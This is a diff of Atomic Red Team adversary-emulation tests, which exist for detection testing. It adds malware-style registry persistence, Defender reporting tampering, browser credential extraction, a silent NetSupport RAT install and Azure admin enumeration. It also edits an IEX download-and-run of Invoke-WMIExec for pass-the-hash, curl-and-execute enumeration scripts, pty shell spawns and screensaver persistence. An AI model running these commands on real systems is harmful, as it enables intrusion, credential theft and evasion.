- T1484.001 Group Policy Modification [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
@@ -231,6 +236,7 @@
- T1108 Redundant Access [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1218.008 Odbcconf](../../T1218.008/T1218.008.md)
- Atomic Test #1: Odbcconf.exe - Execute Arbitrary DLL [windows]
+ - Atomic Test #2: Odbcconf.exe - Load Response File [windows]
- T1045 Software Packing [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1055.013 Process Doppelgänging [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1574.005 Executable Installer File Permissions Weakness [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
@@ -1142,6 +1148,7 @@
- Atomic Test #11: WinPwn - BrowserPwn [windows]
- Atomic Test #12: WinPwn - Loot local Credentials - mimi-kittenz [windows]
- Atomic Test #13: WinPwn - PowerSharpPack - Sharpweb for Browser Credentials [windows]
+ - Atomic Test #15: WebBrowserPassView - Credentials from Browser [windows]
- T1557.003 DHCP Spoofing [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1552.004 Private Keys](../../T1552.004/T1552.004.md)
- Atomic Test #1: Private Keys [windows]
@@ -1440,6 +1447,7 @@
- Atomic Test #5: ScreenConnect Application Download and Install on Windows [windows]
- Atomic Test #6: Ammyy Admin Software Execution [windows]
- Atomic Test #7: RemotePC Software Execution [windows]
+ - Atomic Test #8: NetSupport - RAT Execution [windows]
- T1079 Multilayer Encryption [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1205 Traffic Signaling [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1032 Standard Cryptographic Protocol [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
diff --git a/atomics/Indexes/index.yaml b/atomics/Indexes/index.yaml
index 3263a033..132b86af 100644
--- a/atomics/Indexes/index.yaml
+++ b/atomics/Indexes/index.yaml
@@ -10555,6 +10555,105 @@ defense-evasion:
'
name: command_prompt
elevation_required: true
+ - name: NetWire RAT Registry Key Creation
+ auto_generated_guid: 65704cd4-6e36-4b90-b6c1-dc29a82c8e56
+ description: |
+ NetWire continues to create its home key (HKCU\SOFTWARE\NetWire) as well as adding it into the auto-run group in the victim’s registry.
+ See how NetWire malware - https://app.any.run/tasks/41ecdbde-4997-4301-a350-0270448b4c8f/
+ supported_platforms:
+ - windows
+ executor:
+ command: |
+ reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Run /v NetWire /t REG_SZ /d "C:\Users\admin\AppData\Roaming\Install\Host.exe" /f
+ reg add HKCU\SOFTWARE\NetWire /v HostId /t REG_SZ /d HostId-kai6Ci /f
+ reg add HKCU\SOFTWARE\NetWire /v "Install Date" /t REG_SZ /d "2021-08-30 07:17:27" /f
+ cleanup_command: |
+ reg delete HKCU\Software\Microsoft\Windows\CurrentVersion\Run /v NetWire /f >nul 2>&1
+ reg delete HKCU\SOFTWARE\NetWire /va /f >nul 2>&1
+ reg delete HKCU\SOFTWARE\NetWire /f >nul 2>&1
+ name: command_prompt
+ elevation_required: true
+ - name: Ursnif Malware Registry Key Creation
+ auto_generated_guid: c375558d-7c25-45e9-bd64-7b23a97c1db0
+ description: |
+ Ursnif downloads additional modules from the C&C server and saves these in the registry folder HKEY_CURRENT_USER\Software\AppDataLow\Software\Microsoft\
+ More information - https://blog.trendmicro.com/trendlabs-security-intelligence/phishing-campaign-uses-hijacked-emails-to-deliver-ursnif-by-replying-to-ongoing-threads/
+ supported_platforms:
+ - windows
+ executor:
+ command: 'reg add HKCU\Software\AppDataLow\Software\Microsoft\3A861D62-51E0-15700F2219A4
+ /v comsxRes /t REG_BINARY /d 72656463616e617279 /f
+
+ '
+ cleanup_command: |
+ reg delete HKCU\Software\AppDataLow\Software\Microsoft\3A861D62-51E0-15700F2219A4 /va /f >nul 2>&1
+ reg delete HKCU\Software\AppDataLow\Software\Microsoft\3A861D62-51E0-15700F2219A4 /f >nul 2>&1
+ name: command_prompt
+ elevation_required: true
+ - name: Terminal Server Client Connection History Cleared
+ auto_generated_guid: 3448824b-3c35-4a9e-a8f5-f887f68bea21
+ description: 'The built-in Windows Remote Desktop Connection (RDP) client (mstsc.exe)
+ saves the remote computer name (or IP address) and the username that is used
+ to login after each successful connection to the remote computer
+
+ '
+ supported_platforms:
+ - windows
+ dependency_executor_name: powershell
+ dependencies:
+ - description: "Must have the \"MR9\" Remote Desktop Connection history Key
+ \n"
+ prereq_command: 'if ((Get-ItemProperty -Path "HKCU:\SOFTWARE\Microsoft\Terminal
+ Server Client\Default\").MR9) {exit 0} else {exit 1}
+
+ '
+ get_prereq_command: |
+ New-Item -path "HKCU:\SOFTWARE\Microsoft\" -name "Terminal Server Client" -ErrorAction Ignore
+ New-Item -path "HKCU:\SOFTWARE\Microsoft\Terminal Server Client\" -name "Default" -ErrorAction Ignore
+ New-Itemproperty -path "HKCU:\SOFTWARE\Microsoft\Terminal Server Client\Default" -name "MR9" -value "127.0.0.1" -PropertyType "String" -ErrorAction Ignore
+ New-Item -path "HKCU:\SOFTWARE\Microsoft\Terminal Server Client\" -name "Servers" -ErrorAction Ignore
+ New-Item -path "HKCU:\SOFTWARE\Microsoft\Terminal Server Client\Servers" -name "Redcanary" -ErrorAction Ignore
+ executor:
+ command: |
+ reg delete "HKEY_CURRENT_USER\Software\Microsoft\Terminal Server Client\Default" /va /f
+ reg delete "HKEY_CURRENT_USER\Software\Microsoft\Terminal Server Client\Servers" /f
+ name: command_prompt
+ elevation_required: true
+ - name: Disable Windows Error Reporting Settings
+ auto_generated_guid: d2c9e41e-cd86-473d-980d-b6403562e3e1
+ description: "Modify the registry of the currently logged in user using reg.exe
+ via cmd console to disable windows error reporting settings. This Windows
+ feature allow the use to report bug, errors, failure or problems \nencounter
+ in specific application or process.\nSee how azorult malware abuses this technique-
+ https://app.any.run/tasks/a6f2ffe2-e6e2-4396-ae2e-04ea0143f2d8/\n"
+ supported_platforms:
+ - windows
+ executor:
+ command: |
+ reg add HKLM64\SOFTWARE\Policies\Microsoft\Windows Defender\Reporting /v DisableEnhancedNotifications /t REG_DWORD /d 1 /f
+ reg add HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Reporting /v DisableEnhancedNotifications /t REG_DWORD /d 1 /f
+ cleanup_command: |
+ reg delete HKLM64\SOFTWARE\Policies\Microsoft\Windows Defender\Reporting /v DisableEnhancedNotifications /f >nul 2>&1
+ reg delete HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Reporting /v DisableEnhancedNotifications /f >nul 2>&1
+ name: command_prompt
+ elevation_required: true
+ - name: DisallowRun Execution Of Certain Application
+ auto_generated_guid: 71db768a-5a9c-4047-b5e7-59e01f188e84
+ description: "Modify the registry of the currently logged in user using reg.exe
+ via cmd console to prevent user running specific computer programs that could
+ aid them in manually removing malware or detecting it \nusing security product.\nSee
+ how azorult malware abuses this technique- https://app.any.run/tasks/a6f2ffe2-e6e2-4396-ae2e-04ea0143f2d8/\n"
+ supported_platforms:
+ - windows
+ executor:
+ command: |
+ reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v DisallowRun /t REG_DWORD /d 1 /f
+ reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun /v DisableEnhancedNotifications /t REG_DWORD /d 1 /f
+ cleanup_command: |
+ reg delete HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v DisallowRun /f >nul 2>&1
+ reg delete HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun /v 1 /f >nul 2>&1
+ name: command_prompt
+ elevation_required: true
T1574.008:
technique:
x_mitre_platforms:
@@ -12223,6 +12322,39 @@ defense-evasion:
'
name: command_prompt
+ - name: Odbcconf.exe - Load Response File
+ auto_generated_guid: 331ce274-f9c9-440b-9f8c-a1006e1fce0b
+ description: |
+ Execute arbitrary response file that will spawn PowerShell.exe.
+ Source files: https://github.com/woanware/application-restriction-bypasses
+ supported_platforms:
+ - windows
+ input_arguments:
+ rsp_file_name:
+ description: Response file name to load
+ type: String
+ default: T1218.008.rsp
+ rsp_file_path:
+ description: Response file path
+ type: String
+ default: PathToAtomicsFolder\T1218.008\bin\
+ dependency_executor_name: powershell
+ dependencies:
+ - description: 'T1218.008.rsp must exist on disk at specified location (#{rsp_file_path}#{rsp_file_name})
+
+ '
+ prereq_command: 'if (Test-Path #{rsp_file_path}#{rsp_file_name}) {exit 0}
+ else {exit 1}
+
+ '
+ get_prereq_command: |
+ Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1218.008/bin/T1218.008.rsp" -OutFile "#{rsp_file_path}#{rsp_file_name}"
+ Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1218.008/bin/o.dll" -OutFile "#{rsp_file_path}\o.dll"
+ executor:
+ command: |
+ cd #{rsp_file_path}
+ odbcconf.exe -f #{rsp_file_name}
+ name: command_prompt
T1144:
technique:
x_mitre_platforms:
@@ -23263,7 +23395,7 @@ defense-evasion:
executor:
command: |-
[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12
- IEX (IWR 'https://github.com/Kevin-Robertson/Invoke-TheHash/blob/01ee90f934313acc7d09560902443c18694ed0eb/Invoke-WMIExec.ps1' -UseBasicParsing);Invoke-WMIExec -Target #{target} -Username #{user_name} -Hash #{ntlm} -Command #{command}
+ IEX (IWR 'https://raw.githubusercontent.com/Kevin-Robertson/Invoke-TheHash/01ee90f934313acc7d09560902443c18694ed0eb/Invoke-WMIExec.ps1' -UseBasicParsing);Invoke-WMIExec -Target #{target} -Username #{user_name} -Hash #{ntlm} -Command #{command}
name: powershell
T1574.002:
technique:
@@ -37337,12 +37469,17 @@ privilege-escalation:
default: C:\Windows\System32\cmd.exe
executor:
command: |
+ reg export "HKEY_CURRENT_USER\Control Panel\Desktop" %userprofile%\backup.reg
copy #{input_binary} "%SystemRoot%\System32\evilscreensaver.scr"
reg.exe add "HKEY_CURRENT_USER\Control Panel\Desktop" /v ScreenSaveActive /t REG_SZ /d 1 /f
reg.exe add "HKEY_CURRENT_USER\Control Panel\Desktop" /v ScreenSaveTimeout /t REG_SZ /d 60 /f
reg.exe add "HKEY_CURRENT_USER\Control Panel\Desktop" /v ScreenSaverIsSecure /t REG_SZ /d 0 /f
reg.exe add "HKEY_CURRENT_USER\Control Panel\Desktop" /v SCRNSAVE.EXE /t REG_SZ /d "%SystemRoot%\System32\evilscreensaver.scr" /f
shutdown /r /t 0
+ cleanup_command: |
+ reg import %userprofile%\backup.reg
+ del %userprofile%\backup.reg
+ del %SystemRoot%\System32\evilscreensaver.scr
name: command_prompt
elevation_required: true
T1543.001:
@@ -44351,13 +44488,16 @@ execution:
prereq_command: 'if [ -f #{autosuid} ]; then exit 0; else exit 1; fi;
'
- get_prereq_command: 'curl #{autosuid_url} --output #{autosuid}
+ get_prereq_command: 'curl --create-dirs #{autosuid_url} --output #{autosuid}
'
executor:
command: |
chmod +x #{autosuid}
bash #{autosuid}
+ cleanup_command: 'rm -rf #{autosuid}
+
+ '
name: sh
- name: LinEnum tool execution
auto_generated_guid: a2b35a63-9df1-4806-9a4d-5fe0500845f2
@@ -44386,13 +44526,16 @@ execution:
prereq_command: 'if [ -f #{linenum} ]; then exit 0; else exit 1; fi;
'
- get_prereq_command: 'curl #{linenum_url} --output #{linenum}
+ get_prereq_command: 'curl --create-dirs #{linenum_url} --output #{linenum}
'
executor:
command: |
chmod +x #{linenum}
bash #{linenum}
+ cleanup_command: 'rm -rf #{linenum}
+
+ '
name: sh
T1559:
technique:
@@ -45000,9 +45143,10 @@ execution:
'
executor:
command: |-
- python -c "import pty;pty.spawn('/bin/sh')"
+ which_python=$(which python || which python3 || which python2)
+ $which_python -c "import pty;pty.spawn('/bin/sh')"
exit
- python -c "import pty;pty.spawn('/bin/bash')"
+ $which_python -c "import pty;pty.spawn('/bin/bash')"
exit
name: bash
T1569:
@@ -59472,12 +59616,17 @@ persistence:
default: C:\Windows\System32\cmd.exe
executor:
command: |
+ reg export "HKEY_CURRENT_USER\Control Panel\Desktop" %userprofile%\backup.reg
copy #{input_binary} "%SystemRoot%\System32\evilscreensaver.scr"
reg.exe add "HKEY_CURRENT_USER\Control Panel\Desktop" /v ScreenSaveActive /t REG_SZ /d 1 /f
reg.exe add "HKEY_CURRENT_USER\Control Panel\Desktop" /v ScreenSaveTimeout /t REG_SZ /d 60 /f
reg.exe add "HKEY_CURRENT_USER\Control Panel\Desktop" /v ScreenSaverIsSecure /t REG_SZ /d 0 /f
reg.exe add "HKEY_CURRENT_USER\Control Panel\Desktop" /v SCRNSAVE.EXE /t REG_SZ /d "%SystemRoot%\System32\evilscreensaver.scr" /f
shutdown /r /t 0
+ cleanup_command: |
+ reg import %userprofile%\backup.reg
+ del %userprofile%\backup.reg
+ del %SystemRoot%\System32\evilscreensaver.scr
name: command_prompt
elevation_required: true
T1543.001:
@@ -64132,6 +64281,48 @@ collection:
Invoke-EnumerateAzureBlobs -base #{base} -permutations #{wordlist} -outputfile "#{output_file}"
cleanup_command: 'remove-item #{output_file} -erroraction silentlycontinue
+ '
+ name: powershell
+ - name: Azure - Scan for Anonymous Access to Azure Storage (Powershell)
+ auto_generated_guid: 146af1f1-b74e-4aa7-9895-505eb559b4b0
+ description: "Upon successful execution, this test will test for anonymous access
+ to Azure storage containers by invoking a web request and outputting the results
+ to a file. \nThe corresponding response could then be interpreted to determine
+ whether or not the resource/container exists, as well as other information.
+ \nSee https://ninocrudele.com/the-three-most-effective-and-dangerous-cyberattacks-to-azure-and-countermeasures-part-2-attack-the-azure-storage-service
+ \ \n"
+ supported_platforms:
+ - iaas:azure
+ input_arguments:
+ base_name:
+ description: Azure storage account name to test
+ type: String
+ default: T1530Test2
+ output_file:
+ description: File to output results to
+ type: String
+ default: "$env:temp\\T1530Test2.txt"
+ container_name:
+ description: Container name to search for (optional)
+ type: String
+ default:
+ blob_name:
+ description: Blob name to search for (optional)
+ type: String
+ default:
+ executor:
+ command: |
+ try{$response = invoke-webrequest "https://#{base_name}.blob.core.windows.net/#{container_name}/#{blob_name}" -method "GET"}
+ catch [system.net.webexception]
+ {if($_.Exception.Response -ne $null)
+ {$Response = $_.Exception.Response.GetResponseStream()
+ $ReadResponse = New-Object System.IO.StreamReader($Response)
+ $ReadResponse.BaseStream.Position = 0
+ $responseBody = $ReadResponse.ReadToEnd()}
+ else {$responseBody = "The storage account could not be anonymously accessed."}}
+ "Response received for #{base_name}.blob.core.windows.net/#{container_name}/#{blob_name}: $responsebody" | out-file -filepath #{output_file} -append
+ cleanup_command: 'remove-item #{output_file} -erroraction silentlycontinue
+
'
name: powershell
T1074.002:
@@ -68322,7 +68513,7 @@ lateral-movement:
executor:
command: |-
[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12
- IEX (IWR 'https://github.com/Kevin-Robertson/Invoke-TheHash/blob/01ee90f934313acc7d09560902443c18694ed0eb/Invoke-WMIExec.ps1' -UseBasicParsing);Invoke-WMIExec -Target #{target} -Username #{user_name} -Hash #{ntlm} -Command #{command}
+ IEX (IWR 'https://raw.githubusercontent.com/Kevin-Robertson/Invoke-TheHash/01ee90f934313acc7d09560902443c18694ed0eb/Invoke-WMIExec.ps1' -UseBasicParsing);Invoke-WMIExec -Target #{target} -Username #{user_name} -Hash #{ntlm} -Command #{command}
name: powershell
T1021.001:
technique:
@@ -72921,6 +73112,40 @@ credential-access:
rm "/tmp/T1555.003_Login Data" >/dev/null 2>&1
rm "/tmp/T1555.003_Login Data For Account" >/dev/null 2>&1
name: sh
+ - name: WebBrowserPassView - Credentials from Browser
+ auto_generated_guid: e359627f-2d90-4320-ba5e-b0f878155bbe
+ description: The following Atomic test utilizes WebBrowserPassView to extract
+ passwords from browsers on a Window system. WebBrowserPassView is an open
+ source application used to retrieve passwords stored on a local computer.
+ Recently noticed as a tool used in the BlackCat Ransomware.
+ supported_platforms:
+ - windows
+ input_arguments:
+ webbrowserpassview_path:
+ description: 'Path to the WebBrowserPassView executable '
+ type: String
+ default: PathToAtomicsFolder\T1555.003\bin\WebBrowserPassView.exe
+ dependency_executor_name: powershell
+ dependencies:
+ - description: 'Check if WebBrowserPassView.exe exists in the specified path
+ #{webbrowserpassview_path}
+
+ '
+ prereq_command: 'if (Test-Path #{webbrowserpassview_path}) {exit 0} else {exit
+ 1}
+
+ '
+ get_prereq_command: 'Invoke-WebRequest https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1555.003/bin/WebBrowserPassView.exe
+ -OutFile #{webbrowserpassview_path}
+
+ '
+ executor:
+ command: |
+ Start-Process #{webbrowserpassview_path}
+ Start-Sleep -Second 4
+ Stop-Process -Name "WebBrowserPassView"
+ name: powershell
+ elevation_required: true
T1557.003:
technique:
x_mitre_platforms:
@@ -74935,7 +75160,7 @@ credential-access:
executor:
command: |
findstr /si pass *.xml *.doc *.txt *.xls
- ls -R | select-string -Pattern password
+ ls -R | select-string -ErrorAction SilentlyContinue -Pattern password
name: powershell
- name: Access unattend.xml
auto_generated_guid: 367d4004-5fc0-446d-823f-960c74ae52c3
@@ -78858,7 +79083,7 @@ discovery:
computer_name:
description: Name of remote system to query
type: String
- default: "$env:COMPUTERNAME"
+ default: "%COMPUTERNAME%"
executor:
command: 'query user /SERVER:#{computer_name}
@@ -80308,7 +80533,7 @@ discovery:
'
get_prereq_command: "sudo #{package_installer} \n"
executor:
- command: 'smbstatus --shares
+ command: 'sudo smbstatus --shares
'
name: bash
@@ -80883,6 +81108,70 @@ discovery:
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/PowerSharpPack/master/PowerSharpBinaries/Invoke-Seatbelt.ps1')
Invoke-Seatbelt -Command "-group=all"; pause
name: powershell
+ - name: Azure Security Scan with SkyArk
+ auto_generated_guid: 26a18d3d-f8bc-486b-9a33-d6df5d78a594
+ description: "Upon successful execution, this test will utilize a valid read-only
+ Azure AD user's credentials to conduct a security scan and determine what
+ users exist in a given tenant, as well as identify any admin users. \nOnce
+ the test is complete, a folder will be output to the temp directory that contains
+ 3 csv files which provide info on the discovered users. \nSee https://github.com/cyberark/SkyArk
+ \n"
+ supported_platforms:
+ - azure-ad
+ input_arguments:
+ username:
+ description: Azure AD username
+ type: String
+ default:
+ password:
+ description: Azure AD password
+ type: String
+ default: T1082Az
+ dependency_executor_name: powershell
+ dependencies:
+ - description: 'The SkyArk AzureStealth module must exist in $env:temp.
+
+ '
+ prereq_command: 'if (test-path $env:temp\AzureStealth.ps1){exit 0} else {exit
+ 1}
+
+ '
+ get_prereq_command: 'invoke-webrequest "https://raw.githubusercontent.com/cyberark/SkyArk/3293ee145e95061a8980dd7b5da0030edc4da5c0/AzureStealth/AzureStealth.ps1"
+ -outfile "$env:temp\AzureStealth.ps1"
+
+ '
+ - description: 'The AzureAD module must be installed.
+
+ '
+ prereq_command: 'try {if (Get-InstalledModule -Name AzureAD -ErrorAction SilentlyContinue)
+ {exit 0} else {exit 1}} catch {exit 1}
+
+ '
+ get_prereq_command: 'Install-Module -Name AzureAD -Force
+
+ '
+ - description: 'The Az module must be installed.
+
+ '
+ prereq_command: 'try {if (Get-InstalledModule -Name Az -ErrorAction SilentlyContinue)
+ {exit 0} else {exit 1}} catch {exit 1}
+
+ '
+ get_prereq_command: 'Install-Module -Name Az -Force
+
+ '
+ executor:
+ command: "Import-Module $env:temp\\AzureStealth.ps1 -force \n$Password
+ = ConvertTo-SecureString -String \"#{password}\" -AsPlainText -Force\n$Credential
+ = New-Object -TypeName System.Management.Automation.PSCredential -ArgumentList
+ \"#{username}\", $Password\nConnect-AzAccount -Credential $Credential\nConnect-AzureAD
+ -Credential $Credential\nScan-AzureAdmins -UseCurrentCred\n"
+ cleanup_command: |
+ $resultstime = Get-Date -Format "yyyyMMdd"
+ $resultsfolder = ("Results-" + $resultstime)
+ remove-item $env:temp\$resultsfolder -recurse -force -erroraction silentlycontinue
+ name: powershell
+ elevation_required: true
T1010:
technique:
x_mitre_platforms:
@@ -84120,13 +84409,17 @@ discovery:
supported_platforms:
- linux
- macos
+ input_arguments:
+ host:
+ description: Host to scan.
+ type: String
+ default: 192.168.1.1
executor:
- command: |
- for port in {1..65535};
- do
- echo >/dev/tcp/192.168.1.1/$port && echo "port $port is open" || echo "port $port is closed" : ;
- done
- name: sh
+ command: 'for port in {1..65535}; do (2>/dev/null echo >/dev/tcp/#{host}/$port)
+ && echo port $port is open ; done
+
+ '
+ name: bash
- name: Port Scan Nmap
auto_generated_guid: 515942b0-a09f-4163-a7bb-22fefb6f185f
description: |
@@ -84179,7 +84472,7 @@ discovery:
apt-get && DEBIAN_FRONTEND=noninteractive apt-get install -y telnet)\n"
executor:
command: |
- nmap -sS #{network_range} -p #{port}
+ sudo nmap -sS #{network_range} -p #{port}
telnet #{host} #{port}
nc -nv #{host} #{port}
name: sh
@@ -87541,6 +87834,41 @@ command-and-control:
-Name \"RPCService\" -force -erroraction silentlycontinue\n"
name: powershell
elevation_required: true
+ - name: NetSupport - RAT Execution
+ auto_generated_guid: ecca999b-e0c8-40e8-8416-ad320b146a75
+ description: "A recent trend by threat actors, once a foothold is established,
+ maintain long term persistence using third party remote services such as NetSupport
+ to provide the operator with access to the network using legitimate services.
+ \n"
+ supported_platforms:
+ - windows
+ input_arguments:
+ NetSupport_Path:
+ description: Path to the NetSupport executable.
+ type: Path
+ default: "$env:temp\\T1219Setup.exe"
+ dependency_executor_name: powershell
+ dependencies:
+ - description: 'NetSupport must be downloaded and exist on the disk at the specified
+ location. (#{NetSupport_Path})
+
+ '
+ prereq_command: 'if (Test-Path #{NetSupport_Path}) {exit 0} else {exit 1}
+
+ '
+ get_prereq_command: 'Start-BitsTransfer -Source "https://nsproducts.azureedge.net/nsm-1270/en/Setup.exe"
+ -Destination "$env:temp\T1219Setup.exe" -dynamic
+
+ '
+ executor:
+ command: 'Start-Process #{NetSupport_Path} -ArgumentList "/S /v/qn"
+
+ '
+ cleanup_command: 'Stop-Process -Name "client32" -force -erroraction silentlycontinue
+
+ '
+ name: powershell
+ elevation_required: true
T1079:
technique:
x_mitre_platforms:
diff --git a/atomics/T1046/T1046.md b/atomics/T1046/T1046.md
index 8df98cb9..496d9bab 100644
--- a/atomics/T1046/T1046.md
+++ b/atomics/T1046/T1046.md
@@ -41,15 +41,17 @@ Upon successful execution, sh will perform a network connection against a single
-
-#### Attack Commands: Run with `sh`!
+#### Inputs:
+| Name | Description | Type | Default Value |
+|------|-------------|------|---------------|
+| host | Host to scan. | String | 192.168.1.1|
-```sh
-for port in {1..65535};
-do
- echo >/dev/tcp/192.168.1.1/$port && echo "port $port is open" || echo "port $port is closed" : ;
-done
+#### Attack Commands: Run with `bash`!
+
+
+```bash
+for port in {1..65535}; do (2>/dev/null echo >/dev/tcp/#{host}/$port) && echo port $port is open ; done
```
@@ -86,7 +88,7 @@ Upon successful execution, sh will utilize nmap, telnet, and nc to contact a sin
```sh
-nmap -sS #{network_range} -p #{port}
+sudo nmap -sS #{network_range} -p #{port}
telnet #{host} #{port}
nc -nv #{host} #{port}
```
diff --git a/atomics/T1046/T1046.yaml b/atomics/T1046/T1046.yaml
index 4b8b5ac1..625031dc 100644
--- a/atomics/T1046/T1046.yaml
+++ b/atomics/T1046/T1046.yaml
@@ -10,13 +10,15 @@ atomic_tests:
supported_platforms:
- linux
- macos
+ input_arguments:
+ host:
+ description: Host to scan.
+ type: String
+ default: 192.168.1.1
executor:
command: |
- for port in {1..65535};
- do
- echo >/dev/tcp/192.168.1.1/$port && echo "port $port is open" || echo "port $port is closed" : ;
- done
- name: sh
+ for port in {1..65535}; do (2>/dev/null echo >/dev/tcp/#{host}/$port) && echo port $port is open ; done
+ name: bash
- name: Port Scan Nmap
auto_generated_guid: 515942b0-a09f-4163-a7bb-22fefb6f185f
description: |
@@ -61,7 +63,7 @@ atomic_tests:
(which yum && yum -y install epel-release telnet)||(which apt-get && DEBIAN_FRONTEND=noninteractive apt-get install -y telnet)
executor:
command: |
- nmap -sS #{network_range} -p #{port}
+ sudo nmap -sS #{network_range} -p #{port}
telnet #{host} #{port}
nc -nv #{host} #{port}
name: sh
diff --git a/atomics/T1059.004/T1059.004.md b/atomics/T1059.004/T1059.004.md
index 4f66055c..83921a97 100644
--- a/atomics/T1059.004/T1059.004.md
+++ b/atomics/T1059.004/T1059.004.md
@@ -121,6 +121,10 @@ chmod +x #{autosuid}
bash #{autosuid}
```
+#### Cleanup Commands:
+```sh
+rm -rf #{autosuid}
+```
@@ -132,7 +136,7 @@ if [ -f #{autosuid} ]; then exit 0; else exit 1; fi;
```
##### Get Prereq Commands:
```bash
-curl #{autosuid_url} --output #{autosuid}
+curl --create-dirs #{autosuid_url} --output #{autosuid}
```
@@ -168,6 +172,10 @@ chmod +x #{linenum}
bash #{linenum}
```
+#### Cleanup Commands:
+```sh
+rm -rf #{linenum}
+```
@@ -179,7 +187,7 @@ if [ -f #{linenum} ]; then exit 0; else exit 1; fi;
```
##### Get Prereq Commands:
```bash
-curl #{linenum_url} --output #{linenum}
+curl --create-dirs #{linenum_url} --output #{linenum}
```
diff --git a/atomics/T1059.004/T1059.004.yaml b/atomics/T1059.004/T1059.004.yaml
index cccb737d..ef45dfb7 100644
--- a/atomics/T1059.004/T1059.004.yaml
+++ b/atomics/T1059.004/T1059.004.yaml
@@ -60,13 +60,14 @@ atomic_tests:
prereq_command: |
if [ -f #{autosuid} ]; then exit 0; else exit 1; fi;
get_prereq_command: |
- curl #{autosuid_url} --output #{autosuid}
+ curl --create-dirs #{autosuid_url} --output #{autosuid}
executor:
command: |
chmod +x #{autosuid}
bash #{autosuid}
+ cleanup_command: |
+ rm -rf #{autosuid}
name: sh
-
- name: LinEnum tool execution
auto_generated_guid: a2b35a63-9df1-4806-9a4d-5fe0500845f2
description: |
@@ -89,9 +90,11 @@ atomic_tests:
prereq_command: |
if [ -f #{linenum} ]; then exit 0; else exit 1; fi;
get_prereq_command: |
- curl #{linenum_url} --output #{linenum}
+ curl --create-dirs #{linenum_url} --output #{linenum}
executor:
command: |
chmod +x #{linenum}
bash #{linenum}
- name: sh
\ No newline at end of file
+ cleanup_command: |
+ rm -rf #{linenum}
+ name: sh
diff --git a/atomics/T1059.006/T1059.006.md b/atomics/T1059.006/T1059.006.md
index 0dd01c8c..731d8401 100644
--- a/atomics/T1059.006/T1059.006.md
+++ b/atomics/T1059.006/T1059.006.md
@@ -220,9 +220,10 @@ ID T1059.006. Adversaries may abuse Python commands and scripts for execution. P
```bash
-python -c "import pty;pty.spawn('/bin/sh')"
+which_python=$(which python || which python3 || which python2)
+$which_python -c "import pty;pty.spawn('/bin/sh')"
exit
-python -c "import pty;pty.spawn('/bin/bash')"
+$which_python -c "import pty;pty.spawn('/bin/bash')"
exit
```
diff --git a/atomics/T1059.006/T1059.006.yaml b/atomics/T1059.006/T1059.006.yaml
index 94a5eae7..a5502e79 100644
--- a/atomics/T1059.006/T1059.006.yaml
+++ b/atomics/T1059.006/T1059.006.yaml
@@ -164,8 +164,9 @@ atomic_tests:
pip install requests
executor:
command: |-
- python -c "import pty;pty.spawn('/bin/sh')"
+ which_python=$(which python || which python3 || which python2)
+ $which_python -c "import pty;pty.spawn('/bin/sh')"
exit
- python -c "import pty;pty.spawn('/bin/bash')"
+ $which_python -c "import pty;pty.spawn('/bin/bash')"
exit
name: bash
diff --git a/atomics/T1082/T1082.md b/atomics/T1082/T1082.md
index fc0389c8..459e96cb 100644
--- a/atomics/T1082/T1082.md
+++ b/atomics/T1082/T1082.md
@@ -52,6 +52,8 @@ Infrastructure as a Service (IaaS) cloud providers such as AWS, GCP, and Azure a
- [Atomic Test #22 - WinPwn - PowerSharpPack - Seatbelt](#atomic-test-22---winpwn---powersharppack---seatbelt)
+- [Atomic Test #23 - Azure Security Scan with SkyArk](#atomic-test-23---azure-security-scan-with-skyark)
+
@@ -729,4 +731,81 @@ Invoke-Seatbelt -Command "-group=all"; pause
+
+
+
+## Atomic Test #23 - Azure Security Scan with SkyArk
+Upon successful execution, this test will utilize a valid read-only Azure AD user's credentials to conduct a security scan and determine what users exist in a given tenant, as well as identify any admin users.
+Once the test is complete, a folder will be output to the temp directory that contains 3 csv files which provide info on the discovered users.
+See https://github.com/cyberark/SkyArk
+
+**Supported Platforms:** Azure-ad
+
+
+**auto_generated_guid:** 26a18d3d-f8bc-486b-9a33-d6df5d78a594
+
+
+
+
+
+#### Inputs:
+| Name | Description | Type | Default Value |
+|------|-------------|------|---------------|
+| username | Azure AD username | String | |
+| password | Azure AD password | String | T1082Az|
+
+
+#### Attack Commands: Run with `powershell`! Elevation Required (e.g. root or admin)
+
+
+```powershell
+Import-Module $env:temp\AzureStealth.ps1 -force
+$Password = ConvertTo-SecureString -String "#{password}" -AsPlainText -Force
+$Credential = New-Object -TypeName System.Management.Automation.PSCredential -ArgumentList "#{username}", $Password
+Connect-AzAccount -Credential $Credential
+Connect-AzureAD -Credential $Credential
+Scan-AzureAdmins -UseCurrentCred
+```
+
+#### Cleanup Commands:
+```powershell
+$resultstime = Get-Date -Format "yyyyMMdd"
+$resultsfolder = ("Results-" + $resultstime)
+remove-item $env:temp\$resultsfolder -recurse -force -erroraction silentlycontinue
+```
+
+
+
+#### Dependencies: Run with `powershell`!
